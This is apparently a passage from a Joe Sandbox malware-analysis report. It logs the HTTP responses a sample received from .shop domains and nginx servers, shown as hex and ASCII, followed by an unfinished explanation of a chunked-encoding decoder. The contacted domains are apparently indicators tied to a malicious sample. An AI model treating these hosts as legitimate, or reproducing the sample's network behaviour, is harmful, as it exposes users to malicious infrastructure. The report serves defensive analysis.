be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_b+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmLav09NF1diV4TQQ10ObZImDP0HyhpxDukRJdCuQ8KTDEhhxXijN1xtcWUtPvh2sQ%2FH0vLNungj27aNSinRyp67g5iCey7N7pXul%2BUEduoivihgUyNcpK0KUcfhdwUbF2cw2dh6YQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30c85eb843b3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1885&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 19:49:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHbqSQHjPKquvRJKM0e3FIZr%2F0n%2BrkuGSQ36wCPGT3DzCpXH530QA5upd14kszqy7m2fUL5UAeggMbGZTKNv83t0ncJJqyAaukwNhUoLUk4Iv5xlw3em8IVBSAuVfMmtS0Iv0aUeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fff30d86a36727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=587&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 
0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 
0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 
0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Server: nginx
                    Date: Fri, 10 Jan 2025 19:50:05 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 403 Forbidden
                    Server: nginx
                    Date: Fri, 10 Jan 2025 19:50:08 GMT
                    Content-Type: text/html; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:50:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
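                The 403 responses above are recorded twice: as the raw chunked bytes ("Data Raw") and as a printable rendering ("Data Ascii") from which the CR/LF pairs have been stripped. The decoder below is an added example, not part of the Joe Sandbox report. It rebuilds the body from the raw hex, walks the HTTP/1.1 chunked framing (chunk-size line, data, CRLF, zero-length last-chunk) and confirms that the single 0x224-byte chunk is exactly the 548-byte nginx error page. The hex is copied from the report; because the padding comment is literally repeated six times in the capture it is written once and multiplied. Trailer fields are not handled, since none occur here.

```python
"""Decode a Joe Sandbox 'Data Raw' hex dump and parse its HTTP/1.1 chunked framing.

Added example, not part of the sandbox report. DATA_RAW is the hex of the 403
response above; the nginx padding comment is literally repeated six times in the
capture, so it is written once and multiplied.
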